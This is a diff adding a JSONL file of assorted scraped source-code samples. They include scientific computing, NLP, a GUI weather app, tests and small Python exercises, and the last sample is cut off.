diff --git "a/4328.jsonl" "b/4328.jsonl" new file mode 100644--- /dev/null +++ "b/4328.jsonl" @@ -0,0 +1,665 @@ +{"seq_id":"316938271","text":"import math\n\ndef mandel(real, imag):\n \"\"\"\n Compute a point in the mandelbrot.\n\n The logarithm of number of iterations needed to\n determine whetner a complex point is in the\n mandelbrot set.\n\n Args:\n real, imag\n\n Returns:\n And integer in the range 1-255.\n \"\"\"\n x = 0\n y = 0\n for i in range(1, 257):\n if x * x + y * y > 4.0:\n break\n xt = real + x*x - y*y\n y = imag + 2.0*x*y\n x = xt\n\ndef mandelbrot(size_x, size_y):\n return [[mandel((3.5*x/size_x) - 2.5,\n (2.0 *y/size_y) - 1.0)\n for x in range(size_x)]\n for y in range(size_y)]\n\n","sub_path":"pluralsight/python_fundamentals/files_and_resource_mgmt/mandel.py","file_name":"mandel.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"105904619","text":"\n\n#calss header\nclass _SMEAR():\n\tdef __init__(self,): \n\t\tself.name = \"SMEAR\"\n\t\tself.definitions = [u'a dirty mark made by spreading a liquid or a thick substance over a surface: ', u\"an attempt to harm someone's reputation by publicly accusing them of something that is unpleasant, unreasonable, or unlikely to be true: \", u\"a medical test in which cells from a woman's cervix (= entrance to the womb) are removed and examined to discover if there is any disease\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_smear.py","file_name":"_smear.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"424863307","text":"from functools import partial\nimport time\nfrom qcodes.instrument.base import Instrument\nfrom qcodes.utils import validators as vals\nfrom qcodes.instrument.parameter import ManualParameter\n\n\nclass ConversionBoxControl(Instrument):\n \"\"\"\n This is a meta-instrument for controlling the different switches in the\n conversion box designed in the QuDev lab. 
This class implements the control\n over\n * 2 amplifiers, whose input port can be chosen between the fridge and a\n reference signal\n * 5 up-conversion mixers, that can be operated in modulation or mixer-\n bypass mode\n * a switchboard that can route the input signal to one of the 6 output\n ports\n The switchboard is controlled using an Advantech PCIE-1751 digital I/O card.\n This meta-instrument takes full control of the underlying DIO card which\n should not be modified by other classes.\n \"\"\"\n\n shared_kwargs = ['dio']\n\n def __init__(self, name, dio, switch_time=50e-3, **kw):\n \"\"\"\n :param name: name of the instrument\n :param dio: reference to an Advantech PCIE-1751 instrument\n :param switch_time: duration of the pulse to set the switch\n configuration\n \"\"\"\n super().__init__(name, **kw)\n self.dio = dio\n\n # configure all DIO ports for output\n for i in range(self.dio.port_count()):\n self.dio.set('port{}_dir'.format(i), 0xff)\n\n self._switch_state = {\n 'UC1': 'modulated',\n 'UC2': 'modulated',\n 'UC3': 'modulated',\n 'UC4': 'modulated',\n 'UC5': 'modulated',\n 'WA1': 'measure',\n 'WA2': 'measure',\n 'switch': 'block',\n }\n\n UCkey = ['']*6\n for i in range(1, 6):\n descr = 'switch configuration of up-conversion board {}'\n UCkey[i] = 'UC{}'.format(i)\n self.add_parameter(\n '{}_mode'.format(UCkey[i]),\n label=descr.format(i),\n vals=vals.Enum('modulated', 'bypass'),\n get_cmd=partial(self._switch_state.get, UCkey[i]),\n set_cmd=lambda x: self.set_switch({UCkey[i]: x})\n )\n\n WAkey = ['']*3\n for i in range(1, 3):\n descr = 'switch configuration of warm amplifier {}'\n WAkey[i] = 'WA{}'.format(i)\n self.add_parameter(\n '{}_mode'.format(WAkey[i]),\n label=descr.format(i),\n vals=vals.Enum('reference', 'measure'),\n get_cmd=partial(self._switch_state.get, WAkey[i]),\n set_cmd=lambda x: self.set_switch({WAkey[i]: x})\n )\n\n self.add_parameter(\n 'switch_mode',\n label='switchboard configuration',\n vals=vals.Enum('block', 1, 2, 3, 4, 5, 6),\n get_cmd=partial(self._switch_state.get, 'switch'),\n set_cmd=lambda x: self.set_switch({'switch': x})\n )\n\n self.add_parameter('switch_time', unit='s', vals=vals.Numbers(0, 1),\n label='Duration of the switching pulse',\n parameter_class=ManualParameter,\n initial_value=switch_time)\n\n def set_switch(self, values):\n \"\"\"\n :param values: a dictionary of key: value pairs, where key is one of\n the following: 'UC#', 'WA#' or 'switch' (# denotes the\n board number) and value is the mode to set the switch to.\n \"\"\"\n #logging.debug(values)\n for key in values:\n self.parameters['{}_mode'.format(key)].validate(values[key])\n self._switch_state.update(values)\n\n data = [0x00, 0x00, 0x00, 0x00, 0x00, 0x00]\n data[0] += self._WA_bitpattern(self._switch_state['WA2']) << 0\n data[0] += self._WA_bitpattern(self._switch_state['WA1']) << 2\n data[1] += self._UC_bitpattern(self._switch_state['UC1']) << 0\n data[1] += self._UC_bitpattern(self._switch_state['UC2']) << 2\n data[1] += self._UC_bitpattern(self._switch_state['UC3']) << 4\n data[1] += self._UC_bitpattern(self._switch_state['UC4']) << 6\n data[2] += self._UC_bitpattern(self._switch_state['UC5']) << 0\n data[5] = self._switch_bitpattern(self._switch_state['switch'])\n\n self.dio.write_port(0, data)\n time.sleep(self.switch_time())\n self.dio.write_port(0, [0, 0, 0, 0, 0, 0])\n\n for key in values:\n self.parameters['{}_mode'.format(key)]._save_val(values[key])\n\n @classmethod\n def _WA_bitpattern(cls, mode):\n if mode == 'reference':\n return 0b01\n elif mode == 
'measure':\n return 0b10\n else:\n raise ValueError('Trying to set warm amplifier board switch to '\n 'invalid mode: {}'.format(mode))\n\n @classmethod\n def _UC_bitpattern(cls, mode):\n if mode == 'bypass':\n return 0b01\n elif mode == 'modulated':\n return 0b10\n else:\n raise ValueError('Trying to set up-conversion board switch to '\n 'invalid mode: {}'.format(mode))\n\n @classmethod\n def _switch_bitpattern(cls, mode):\n if mode == 'block':\n return 0b10000000\n elif mode in range(1,7):\n return 1 << (7-mode)\n else:\n raise ValueError('Trying to set the switchboard to invalid mode: '\n '{}'.format(mode))\n","sub_path":"pycqed/instrument_drivers/meta_instrument/conversion_box_control.py","file_name":"conversion_box_control.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"644883682","text":"# -*- coding: utf-8 -*-\nimport nltk, random, math, re, itertools\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom utils import myutils\nimport re\nimport corpus_data\n#myutils.set_ipython_encoding_utf8()\n\nclass TitleGenerator:\n\n #Load tokens and tags from file\n thefile = open('data/tokenized', 'r')\n tokenized_titles = eval(thefile.read())\n thefile.close()\n\n thefile = open('data/tagged', 'r')\n tagged_titles = eval(thefile.read())\n thefile.close()\n\n def __init__(self):\n titles = corpus_data.titles\n #choose random slice of 100 titles from dataset\n self.rand = random.randint(0, len(titles) - 100) \n\n self.titles = titles[self.rand:self.rand+100]\n self.tokenized_titles_slice = self.tokenized_titles[self.rand:self.rand+100]\n self.tagged_titles_slice = self.tagged_titles[self.rand:self.rand+100]\n self.set_title_range()\n\n #generate required stats for generation model\n self.bigrams = self.build_bigrams()\n self.freq_dist = self.build_freq_dist()\n\n #generate required stats for title heuristics\n self.title_pos_structures = self.build_title_pos_structures()\n\n #compute range of title sizes from random 100 slice\n def set_title_range(self):\n self.min_title_length = 5\n self.max_title_length = 5\n for title in self.titles:\n length = len(title.split())\n\n if length > self.max_title_length:\n self.max_title_length = length\n\n if length < self.min_title_length:\n self.min_title_length = length\n\n def build_freq_dist(self):\n flat_all_bigrams = list(itertools.chain(*self.bigrams))\n return nltk.ConditionalFreqDist(flat_all_bigrams) \n\n def build_bigrams(self):\n bigrams = []\n for title in self.tokenized_titles_slice:\n bigrams.append(nltk.bigrams(title))\n return bigrams\n\n def first_words_list(self):\n first_words = []\n for title in self.tokenized_titles_slice:\n first_words.append(title[0])\n return first_words\n\n def build_title(self):\n word = random.choice(self.first_words_list()) #choose random seed word from all starting words\n title_length = random.randint(self.min_title_length, self.max_title_length) #choose random length in range\n generated_title = word + ' '\n\n for i in range(title_length):\n if (self.freq_dist[word]):\n word = random.choice(self.freq_dist[word].most_common(3))[0]\n generated_title += word + ' '\n else:\n break\n\n return generated_title.lower()\n\n def build_title_pos_structures(self):\n sentence_structures = []\n for word_tag_pair in self.tagged_titles:\n temp = []\n for pair in word_tag_pair:\n temp.append(pair[1])\n sentence_structures.append(temp)\n\n return sentence_structures\n\n def 
compare_readability(self,title_pos_structure, generated_title_pos_structure):\n\n #iterate over real POS tagged titles checking for similarity to generated title\n readability = 0\n for index in range(len(title_pos_structure)):\n if len(generated_title_pos_structure) > index:\n if (title_pos_structure[index] == generated_title_pos_structure[index]):\n readability += 1\n else:\n break\n\n return readability\n\n def generate_title(self):\n match_found = False\n\n while not match_found:\n generated_title = self.build_title()\n\n #tokenize and tag generated title\n tokenized = myutils.tokenize_zh_line(generated_title)\n last_word = tokenized[-1]\n tagged = nltk.pos_tag(tokenized)\n\n\n #disallow title to end in stopword\n stopwords = open('data/stop-words/zh_cn.txt')\n stopwords_list = [ word.decode('utf-8').strip() for word in stopwords.readlines() ]\n if(last_word in stopwords_list):\n continue\n\n #disallow exact duplicates of existing titles\n if generated_title in \" \".join(corpus_data.titles):\n continue\n\n #require a certain title length\n if len(generated_title.split()) < self.min_title_length:\n continue\n\n #disallow ending on certain types of words\n generated_structure = []\n for word_tag_pair in tagged:\n generated_structure.append(word_tag_pair[1])\n\n not_aloud = [\"JJ\", \"CC\", \"CD\", \"DT\", \"JJS\", \"JJR\", \"TO\", \"IN\", \"LS\", \"MD\", \"PDT\", \"POS\",\n \"PP\", \"PPS\", \"SYM\", \"UH\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\", \"WDT\", \"WP\",\n \"WPS\", \"WRB\"]\n\n if(generated_structure[-1] in not_aloud):\n continue\n\n #compute 80% match in pos tags\n match_cutoff = int(math.ceil(len(tokenized) *.80))\n\n #check if satisfies readability threshold\n for sentence_structure in self.title_pos_structures:\n match_count = self.compare_readability(sentence_structure, generated_structure)\n if match_count >= match_cutoff:\n match_found = True\n break\n\n return generated_title\n\n","sub_path":"test_zh.py","file_name":"test_zh.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"271634389","text":"from mpi4py import MPI\nfrom tmr import TMR\nimport argparse\n\n# Create the communicator\ncomm = MPI.COMM_WORLD\n\n# Create an argument parser to read in command-line arguments\np = argparse.ArgumentParser()\np.add_argument('--reverse', default=False, action='store_true')\nargs = p.parse_args()\n\n# Load the model from the STEP file\ngeo = TMR.LoadModel('first-section.stp')\n\n# Get the volumes\nvols = geo.getVolumes()\n\n# Get the edges/faces from the geometry\nfaces = geo.getFaces()\nedges = geo.getEdges()\n\n# Set the source/target relationships\nif args.reverse:\n faces[4].setSource(vols[0], faces[5])\nelse:\n faces[5].setSource(vols[0], faces[4])\nedges[8].setSource(edges[5])\n\n# Create the geometry\nmesh = TMR.Mesh(comm, geo)\n\n# Mesh the part\nopts = TMR.MeshOptions()\nopts.num_smoothing_steps = 10\n\n# Mesh the geometry with the given target size\nhtarget = 4.0\nmesh.mesh(htarget, opts=opts)\n\n# Write the mesh to a bdf file\nmesh.writeToBDF('volume-mesh.bdf', 'hex')\n","sub_path":"examples/crm/ucrm.py","file_name":"ucrm.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"511034716","text":"\"\"\"\nCreate a weather_processor.py module with a WeatherProcessor class\ninside.\n• When the program starts, present the user with a menu of choices.\n• Allow the user to download a 
full set of weather data, or to update it.\n◦ When updating, the program should check today’s date and the latest\ndate of weather available in the DB, and download what’s missing\nbetween those two points, without duplicating any data.\n• Allow the user to enter a year range of interest (from year, to year) to\ngenerate the box plot.\n• Allow the user to enter a month and a year to generate the line plot.\n• Use this class to launch and manage all the other tasks.\n• All user interaction should be self contained in the WeatherProcessor\nclass. There should be no user prompt type code anywhere else in the\nprogram.\n\"\"\"\n\nimport wx\nfrom db_operations import DBOperations\nfrom scrape_weather import WeatherScraper\nfrom plot_operations import PlotOperations\n\nclass WeatherProcessor(wx.Frame):\n \"\"\"docstring for WeatherProcessor.\"\"\"\n\n def __init__(self):\n \"\"\"initialize for WeatherProcessor. Use wxpython for user interaction\"\"\"\n self.db_name = 'weather.sqlite'\n self.table_name = 'weather'\n\n super().__init__(parent=None, title='Weather Processor')\n panel = wx.Panel(self)\n my_sizer = wx.BoxSizer(wx.VERTICAL)\n\n # install all or update db buttons\n install_lbl = wx.StaticText(panel)\n big_font = wx.Font(18, wx.ROMAN, wx.ITALIC, wx.NORMAL)\n install_lbl.SetFont(big_font)\n install_lbl.SetLabel('Install All or Update Database')\n my_sizer.Add(install_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n install_all_btn = wx.Button(panel, label='Install All')\n install_all_btn.Bind(wx.EVT_BUTTON, self.clear_db_and_install_all_weather_data)\n my_sizer.Add(install_all_btn, 0, wx.ALL | wx.LEFT, 5)\n\n update_btn = wx.Button(panel, label='Update Database')\n update_btn.Bind(wx.EVT_BUTTON, self.update_db)\n my_sizer.Add(update_btn, 0, wx.ALL | wx.LEFT, 5)\n\n # boxplot part\n boxplot_lbl = wx.StaticText(panel)\n boxplot_lbl.SetFont(big_font)\n boxplot_lbl.SetLabel('Boxplot Year Range')\n my_sizer.Add(boxplot_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n from_lbl = wx.StaticText(panel)\n small_font = wx.Font(14, wx.ROMAN, wx.ITALIC, wx.NORMAL)\n from_lbl.SetFont(small_font)\n from_lbl.SetLabel('From: ')\n my_sizer.Add(from_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n self.start_year_text_ctrl = wx.TextCtrl(panel)\n my_sizer.Add(self.start_year_text_ctrl, 0, wx.ALL | wx.EXPAND, 5)\n\n to_lbl = wx.StaticText(panel)\n to_lbl.SetFont(small_font)\n to_lbl.SetLabel('To: ')\n my_sizer.Add(to_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n self.end_year_text_ctrl = wx.TextCtrl(panel)\n my_sizer.Add(self.end_year_text_ctrl, 0, wx.ALL | wx.EXPAND, 5)\n\n boxplot_btn = wx.Button(panel, label='Generate Boxplot')\n boxplot_btn.Bind(wx.EVT_BUTTON, self.boxplot)\n my_sizer.Add(boxplot_btn, 0, wx.ALL | wx.LEFT, 5)\n\n # lineplot part\n lineplot_lbl = wx.StaticText(panel)\n lineplot_lbl.SetFont(big_font)\n lineplot_lbl.SetLabel('Lineplot Year and Month')\n my_sizer.Add(lineplot_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n year_lbl = wx.StaticText(panel)\n year_lbl.SetFont(small_font)\n year_lbl.SetLabel('Year: ')\n my_sizer.Add(year_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n self.year_text_ctrl = wx.TextCtrl(panel)\n my_sizer.Add(self.year_text_ctrl, 0, wx.ALL | wx.EXPAND, 5)\n\n month_lbl = wx.StaticText(panel)\n month_lbl.SetFont(small_font)\n month_lbl.SetLabel('Month: ')\n my_sizer.Add(month_lbl,0,wx.ALL | wx.ALIGN_LEFT,5)\n\n self.month_text_ctrl = wx.TextCtrl(panel)\n my_sizer.Add(self.month_text_ctrl, 0, wx.ALL | wx.EXPAND, 5)\n\n lineplot_btn = wx.Button(panel, label='Generate Lineplot')\n lineplot_btn.Bind(wx.EVT_BUTTON, self.lineplot)\n 
my_sizer.Add(lineplot_btn, 0, wx.ALL | wx.LEFT, 5)\n\n\n panel.SetSizer(my_sizer)\n self.Show()\n\n def boxplot(self, event):\n \" Generate and save boxplot \"\n start_year = self.start_year_text_ctrl.GetValue()\n end_year = self.end_year_text_ctrl.GetValue()\n db_name = 'weather.sqlite'\n table_name = 'weather'\n my_plot_operations = PlotOperations(db_name, table_name)\n my_plot_operations.generate_boxplot(int(start_year), int(end_year))\n\n def lineplot(self, event):\n \" Generate and save lineplot \"\n year = self.year_text_ctrl.GetValue()\n month = self.month_text_ctrl.GetValue()\n db_name = 'weather.sqlite'\n table_name = 'weather'\n my_plot_operations = PlotOperations(db_name, table_name)\n my_plot_operations.generate_lineplot(int(year), int(month))\n\n def clear_db_and_install_all_weather_data(self, event):\n \" clear db and install all weather data \"\n myweather = WeatherScraper()\n myweather.start_scraping()\n weather_data_from_weather_scraper = myweather.weather\n db_operations = DBOperations(self.db_name)\n db_operations.initialize_db(self.table_name)\n db_operations.purge_data(self.table_name)\n db_operations.save_data(weather_data_from_weather_scraper, self.table_name)\n\n def update_db(self, event):\n \" install missing weather data \"\n myweather = WeatherScraper()\n with DBOperations(self.db_name) as dbcm:\n dbcm.execute(f\"select max(sample_date) from {self.table_name};\")\n latest_date = dbcm.fetchall()[0][0]\n\n print('latest date in db', latest_date)\n myweather.start_scraping(latest_date)\n weather_data_from_weather_scraper = myweather.weather\n db_operations = DBOperations(self.db_name)\n db_operations.initialize_db(self.table_name)\n db_operations.save_data(weather_data_from_weather_scraper, self.table_name)\n\nif __name__ == '__main__':\n app = wx.App()\n frame = WeatherProcessor()\n frame.SetSize(500,600)\n app.MainLoop()\n input(\"press enter to finish\")\n","sub_path":"weather_processor.py","file_name":"weather_processor.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"356775238","text":"#! 
-*- coding: utf-8 -*-\n# Test that the code works: MLM\n\nimport os\nfrom bert4keras.bert import load_pretrained_model\nfrom bert4keras.utils import SimpleTokenizer, load_vocab\nimport numpy as np\n\nalbert_model_path = '/home/gswyhq/github_projects/albert_zh/albert_large_zh'\n# albert_model_path = '/notebooks/albert_zh/albert_large_zh'\n# https://storage.googleapis.com/albert_zh/albert_large_zh.zip\n\nconfig_path = os.path.join(albert_model_path, 'albert_config_large.json')\ncheckpoint_path = os.path.join(albert_model_path, 'albert_model.ckpt')\ndict_path = os.path.join(albert_model_path, 'vocab.txt')\n\ntoken_dict = load_vocab(dict_path)  # load the vocabulary\ntokenizer = SimpleTokenizer(token_dict)  # build the tokenizer\nmodel = load_pretrained_model(config_path, checkpoint_path, with_mlm=True)  # build the model and load the weights\n\n\n# token_ids, segment_ids = tokenizer.encode(u'科学技术是第一生产力')\ntoken_ids, segment_ids = tokenizer.encode(u'中国的首都是北京')\n\nprint('token_ids: {}, segment_ids: {}'.format(token_ids, segment_ids))\n\n# mask out “技术”\n# token_ids[3] = token_ids[4] = token_dict['[MASK]']\ntoken_ids[4] = token_ids[5] = token_dict['[MASK]']\n\n# use the MLM model to predict the masked tokens\nprobas = model.predict([np.array([token_ids]), np.array([segment_ids])])[0]\n# print(tokenizer.decode(probas[3:5].argmax(axis=1))) # the result is exactly “技术”\nprint(tokenizer.decode(probas.argmax(axis=1)))\n","sub_path":"examples/basic_masked_language_model.py","file_name":"basic_masked_language_model.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"407480972","text":"# Modules\r\nimport os\r\nimport csv\r\n \r\n\r\n#Declare variables\r\ntotal_votes=0\r\npoll_data_cand = []\r\ncand_name =\"\"\r\ntotal_votes_cand = 0\r\ntotal_perc_cand = 0.000\r\nd ={}\r\n\r\nprint('\n Election Results\n' + '-' *30)\r\n\r\nwith open(\"election_data.csv\") as f:\r\n    reader = csv.reader(f)\r\n    next(reader)\r\n\r\n    #Candidates Name\r\n    for row in reader:\r\n        poll_data_cand.append(row[2])\r\n    \r\n    \r\n    #Total Votes \r\n    total_votes = len(poll_data_cand) \r\n    print(f'Total Votes: {total_votes}\n' + '-'*30)\r\n\r\nsort_can = sorted(poll_data_cand)\r\n# Start the run-length count from the first candidate in sorted order\r\ncand_name = sort_can[0]\r\nlist_cand = []\r\nlist_perc = []\r\nlist_tot = []\r\n\r\nfor x in range(len(sort_can)):\r\n    \r\n    if sort_can[x] == cand_name:\r\n        total_votes_cand+=1\r\n        cand_name=sort_can[x]\r\n        if total_votes == x+1:\r\n            total_perc_cand=total_votes_cand/total_votes*100\r\n            print(f'{cand_name}: {round(total_perc_cand,0)}% ({total_votes_cand})\n') \r\n            list_cand.append(cand_name)\r\n            list_perc.append(round(total_perc_cand,0))\r\n            list_tot.append(total_votes_cand)\r\n        \r\n    else:\r\n        total_perc_cand=total_votes_cand/total_votes*100\r\n        print(f'{cand_name}: {round(total_perc_cand,0)}% ({total_votes_cand})\n')\r\n        list_cand.append(cand_name)\r\n        list_perc.append(round(total_perc_cand,0))\r\n        list_tot.append(total_votes_cand)\r\n        \r\n        total_votes_cand = 1\r\n        cand_name=sort_can[x]\r\n\r\nd = dict(zip(list_cand,zip(list_perc,list_tot)))\r\nprint('-'*30)\r\nkey_max = max(d.keys(),key=(lambda k: d[k]))\r\nprint(f'Winner:{key_max}')\r\nprint('-'*30)\r\n\r\n#Output to text file\r\nwith open('election_results.txt',\"w\") as txt_file:\r\n    txt_file.write(f'\n Election Results\n' + '-' *30)\r\n    txt_file.write(f'\nTotal Votes: {total_votes}\n' + '-'*30)\r\n    for key,v in d.items():\r\n        txt_file.write(f'\n{key,v}\n')\r\n    txt_file.write(f'-'*30)\r\n    txt_file.write(f'\nWinner:{key_max}\n')\r\n    
txt_file.write(f'-'*30)","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"339097966","text":"import time,unittest\nfrom testsuites.base_testcase import BaseTestCase\nfrom pageobjects.login_page import Login_HomePage\nfrom pageobjects.main_page import Main_Homepage\nfrom pageobjects.look_tie_page import Look_Tie_HomePage\nfrom ddt import ddt,data,unpack\n\n@ddt\nclass Test_Search_Tie(BaseTestCase):\n    @unpack\n    def test_search_tie(self):\n        test_login = Login_HomePage(self.driver)\n        test_main = Main_Homepage(self.driver)\n        test_look_tie=Look_Tie_HomePage(self.driver)\n        test_login.login('admin','admin')\n        test_main.search('haotest')\n        test_look_tie.enter_post()\n        title=test_look_tie.check()\n        try:\n            self.assertEqual(title,'haotest',msg=title)\n            print('Assertion result: the post title matches the expected value')\n        except AssertionError:\n            print('Assertion result: the post title does not match the expected value')\n        test_main.logout()\n\n\nif __name__=='__main__':\n    unittest.main()\n\n","sub_path":"testsuites/test_search_tie.py","file_name":"test_search_tie.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"599757663","text":"# Valid Sudoku \n# Determine if a Sudoku is valid, according to: Sudoku Puzzles - The Rules.\n\n# The Sudoku board could be partially filled, where empty cells are filled with the character '.'.\n\n\n# A partially filled sudoku which is valid.\n\n# Note:\n# A valid Sudoku board (partially filled) is not necessarily solvable. Only the filled cells need to be validated.\n\nclass Solution:\n    # @param board, a 9x9 2D array\n    # @return a boolean\n    def isValidSudoku(self, board):\n        for row in board:\n            if not Solution.isValidBlock(row):\n                return False\n        for i in range(9):\n            col = [row[i] for row in board]\n            if not Solution.isValidBlock(col):\n                return False\n        for i in range(3):\n            for j in range(3):\n                # Collect the 3x3 sub-block; the loop clauses must run\n                # outer-to-inner (rows first, then cells within each row).\n                block = [cell for row in board[3*i: 3*i+3] for cell in row[3*j:3*j+3]]\n                if not Solution.isValidBlock(block):\n                    return False\n        return True\n\n    @staticmethod\n    def isValidBlock(block):\n        counter = [0]*9\n        for cell in block:\n            if cell == '.':\n                continue\n            num = int(cell)\n            if num < 1 or num > 9:\n                return False\n            # digits are 1-9 but counter indices are 0-8\n            if counter[num-1] > 0:\n                return False\n            counter[num-1] = 1\n        return True\n","sub_path":"036_ValidSudoku/valid_sudoku.py","file_name":"valid_sudoku.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"562235023","text":"import random\n\nrand_num = random.randrange(1,51)\n\ni = 1\n\n\nwhile(i != rand_num):\n    i +=1\n\nprint(\"The random value is :\", rand_num)\n\ni = 1\n\nwhile i<= 20:\n    if(i%2) == 0:\n        i +=1\n        continue\n    if i == 15:\n        break\n    print(\"odd :\", i)\n\n    i +=1\n\n","sub_path":"loops/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"72472603","text":"import dolfin as df\n\nfrom typing import (\n    Dict,\n    Any,\n    Tuple,\n    NamedTuple,\n    Iterable,\n)\n\nfrom coupled_utils import (\n    CellTags,\n    InterfaceTags,\n    CoupledMonodomainParameters,\n    create_linear_solver,\n    time_stepper,\n)\n\n\nclass CoupledMonodomainSolver:\n    def __init__(\n        self,\n        time: df.Constant,\n        mesh: df.Mesh,\n        conductivity: Dict[int, df.Expression],\n        conductivity_ratio: Dict[int, df.Expression],\n        cell_function: df.MeshFunction,\n        cell_tags: 
CellTags,\n        interface_function: df.MeshFunction,\n        interface_tags: InterfaceTags,\n        parameters: CoupledMonodomainParameters,\n        neumann_boundary_condition: Dict[int, df.Expression] = None,\n        v_prev: df.Function = None\n    ) -> None:\n        self._time = time\n        self._mesh = mesh\n        self._conductivity = conductivity\n        self._cell_function = cell_function\n        self._cell_tags = cell_tags\n        self._interface_function = interface_function\n        self._interface_tags = interface_tags\n        self._parameters = parameters\n\n        if neumann_boundary_condition is None:\n            self._neumann_boundary_condition: Dict[int, df.Expression] = dict()\n        else:\n            self._neumann_boundary_condition = neumann_boundary_condition\n\n        if not set(conductivity.keys()) == set(conductivity_ratio.keys()):\n            raise ValueError(\"intracellular conductivity and lambda do not have matching keys.\")\n        self._lambda = conductivity_ratio\n\n        # Function spaces\n        self._function_space = df.FunctionSpace(mesh, \"CG\", 1)\n\n        # Trial, test and previous functions\n        self._v_trial = df.TrialFunction(self._function_space)\n        self._v_test = df.TestFunction(self._function_space)\n\n        self._v = df.Function(self._function_space)\n        if v_prev is None:\n            self._v_prev = df.Function(self._function_space)\n        else:\n            # v_prev is shipped from an odesolver.\n            self._v_prev = v_prev\n\n        _cell_tags = set(self._cell_tags)\n        _cell_function_values = set(self._cell_function.array())\n        if not _cell_tags <= _cell_function_values:\n            msg = f\"Cell function does not contain {_cell_tags - _cell_function_values}\"\n            raise ValueError(msg)\n\n        _interface_tags = set(self._interface_tags)\n        _interface_function_values = {*set(self._interface_function.array()), None}\n        if not _interface_tags <= _interface_function_values:\n            msg = f\"interface function does not contain {_interface_tags - _interface_function_values}.\"\n            raise ValueError(msg)\n\n        # Create integration measures -- Interfaces\n        self._dGamma = df.Measure(\"ds\", domain=self._mesh, subdomain_data=self._interface_function)\n\n        # Create integration measures -- Cells\n        self._dOmega = df.Measure(\"dx\", domain=self._mesh, subdomain_data=self._cell_function)\n\n        # Create variational forms\n        self._timestep = df.Constant(self._parameters.timestep)\n        self._lhs, self._rhs = self._variational_forms()\n\n        # Preassemble left-hand side (will be updated if time-step changes)\n        self._lhs_matrix = df.assemble(self._lhs)\n        self._rhs_vector = df.Vector(mesh.mpi_comm(), self._lhs_matrix.size(0))\n        self._lhs_matrix.init_vector(self._rhs_vector, 0)\n\n        self._linear_solver = create_linear_solver(self._lhs_matrix, self._parameters)\n\n    def _variational_forms(self) -> Tuple[Any, Any]:\n        # Localise variables for convenience\n        dt = self._timestep\n        theta = self._parameters.theta\n        Mi = self._conductivity\n        lbda = self._lambda\n\n        dOmega = self._dOmega\n        dGamma = self._dGamma\n\n        v = self._v_trial\n        v_test = self._v_test\n\n        # Set-up variational problem\n        dvdt = (v - self._v_prev)/dt\n        v_mid = theta*v + (1.0 - theta)*self._v_prev\n\n        # Cell contributions\n        Form = dvdt*v_test*dOmega()\n        for cell_tag in self._cell_tags:\n            Form += df.inner(Mi[cell_tag]*df.grad(v_mid), df.grad(v_test))*dOmega(cell_tag)\n\n        # Boundary contributions\n        for interface_tag in self._interface_tags:\n            neumann_bc = self._neumann_boundary_condition.get(interface_tag, df.Constant(0))\n            neumann_bc = neumann_bc*v_test*dGamma(interface_tag)\n            Form += neumann_bc\n\n        # Interface conditions\n        csf_tag = self._cell_tags.CSF\n        gm_tag = self._cell_tags.GM\n        csf_gm_interface_tag = self._interface_tags.CSF_GM\n        interface_contribution = df.inner(Mi[csf_tag]*df.grad(v), Mi[gm_tag]/(1 + lbda[gm_tag])*df.grad(v))\n        interface_contribution *= dGamma(csf_gm_interface_tag)\n        Form += interface_contribution\n\n        # rhs # TODO: This is not necessary\n        Form += df.Constant(0)*v_test*dOmega\n\n        a, L = df.system(Form)\n        return a, L\n\n    def solution_fields(self) -> Tuple[df.Function, df.Function]:\n        \"\"\"Return current and previous solution.\"\"\"\n        return self._v_prev, self._v\n\n    def step(self, t0, t1) -> None:\n        # Extract interval and thus time-step\n        theta = self._parameters.theta\n        dt = t1 - t0\n        t = t0 + theta*dt\n        self._time.assign(t)\n\n        # Update matrix and linear solvers etc as needed\n        self._update_solver(dt)\n\n        # Assemble right-hand-side\n        df.assemble(self._rhs, tensor=self._rhs_vector)\n\n        # Solve problem\n        self._linear_solver.solve(\n            self._v.vector(),\n            self._rhs_vector\n        )\n\n    def solve(\n        self,\n        t0: float,\n        t1: float,\n        dt: float = None\n    ) -> Iterable[Tuple[Tuple[float, float], Tuple[df.Function, df.Function]]]:\n        \"\"\"\n        Solve the discretization on a given time interval (t0, t1)\n        with a given timestep dt and return 